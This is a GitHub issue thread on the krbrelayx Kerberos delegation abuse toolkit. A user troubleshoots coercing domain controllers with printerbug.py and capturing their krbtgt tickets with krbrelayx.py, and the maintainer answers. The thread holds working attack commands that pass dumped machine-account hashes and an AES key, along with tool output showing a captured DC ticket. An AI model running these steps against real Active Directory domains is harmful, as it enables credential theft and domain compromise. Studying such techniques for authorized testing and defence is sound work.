dirkjanm / krbrelayx

Kerberos unconstrained delegation abuse toolkit
MIT License

Printer bug doesn't work #10

Closed girlgirlbest closed 4 years ago

girlgirlbest commented 4 years ago

Hello, help me please. I read the blog. I used secretsdump to get the machine account (computer.test.com) aes256 key and lm:ntlm hashes, and added a DNS A record for my attacker machine, for example attacker.test.com.

    python krbrelayx.py -aesKEY "aes256key"
    python printerbug.py -hashes lm:ntlm test.com/computer\$@primary-dc.test.com attacker.test.com

printerbug output:

    [] Attempting to trigger authentication via rprn RPC at primary-dc.test.com
    [] Bind OK
    [] Got handle
    DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
    [] Triggered RPC backconnect, this may or ma not have worked

krbrelayx output:

    Procotol client ldaps loaded..
    Procotol client ldap loaded..
    Procotol client smb loaded..

    SMBD: Received connection from "ip address primary-dc.test.com"
    Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
    SMBD: Received connection from "ip address primary-dc.test.com"
    Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
    SMBD: Received connection from "ip address primary-dc.test.com"
    Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'

computer.test.com = Windows 7
primary-dc.test.com = Windows 2012 server
attacker.test.com = kali

dirkjanm commented 4 years ago

It only authenticates with NTLM, which indicates that there is no SPN set for the cifs/attacker.test.com hostname. You probably skipped the step where you'd need to add an SPN for that host as well.

girlgirlbest commented 4 years ago

In your blog you wrote that an SPN with service HOST/attacker.test.com is needed. It now works for me with HOST, but I have one more question. When I use the printer bug against primary-dc.test.com, the krbrelayx output is:

    Got ticket for primary-dc.test.com [krbtgt@test.com]

But if I use it against secondary-dc.test.com, the krbrelayx output is:

    SMBD: receiver connection from "ip address"
    Delegate info not set, cannot extract ticket!
    Make sure the account you use has unconstrained delegation rights.

secondary-dc.test.com = Windows 2012 server
primary-dc.test.com = Windows 2012 server

I checked; both DCs have unconstrained delegation.

dirkjanm commented 4 years ago

I'm not sure what would cause that but for some reason the secondary DC does not think your attacker account has unconstrained delegation.

girlgirlbest commented 4 years ago

Great, thanks. Last question ))) If I use printerbug.py against Windows Server 2008 SP2, the output is:

    [-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
    Traceback (most recent call last):
      File "printerbug.py", line 198, in <module>
        main()
      File "printerbug.py", line 191, in main
        lookup.dump(remote_name)
      File "printerbug.py", line 77, in dump
        self.lookup(rpctransport, remote_host)
      File "printerbug.py", line 87, in lookup
        dce.connect()
      File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 800, in connect
        return self._transport.connect()
      File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 400, in connect
        self.handle = self.smb_connection.openFile(self.tid, self.filename)
      File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 547, in openFile
        raise SessionError(e.get_error_code(), e.get_error_packet())
    impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

    python rcpdump.py test\administrator@"ip address windows 2008 server"

    Protocol [MS-RPRN]: Print System Remote Protocol Presense

dirkjanm commented 4 years ago

Not quite sure what causes this, could be something 2008 specific but I don't have it here to test.

Cyb3rGh0st786 commented 1 year ago

> In your blog you wrote that an SPN with service HOST/attacker.test.com is needed. It now works for me with HOST, but I have one more question. When I use the printer bug against primary-dc.test.com, the krbrelayx output is:
>
>     Got ticket for primary-dc.test.com [krbtgt@test.com]
>
> But if I use it against secondary-dc.test.com, the krbrelayx output is:
>
>     SMBD: receiver connection from "ip address"
>     Delegate info not set, cannot extract ticket!
>     Make sure the account you use has unconstrained delegation rights.
>
> secondary-dc.test.com = Windows 2012 server
> primary-dc.test.com = Windows 2012 server
>
> I checked; both DCs have unconstrained delegation.

@girlgirlbest how did it work? I have added both HOST and CIFS but it did not work for me. I am still getting the below error:

    Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'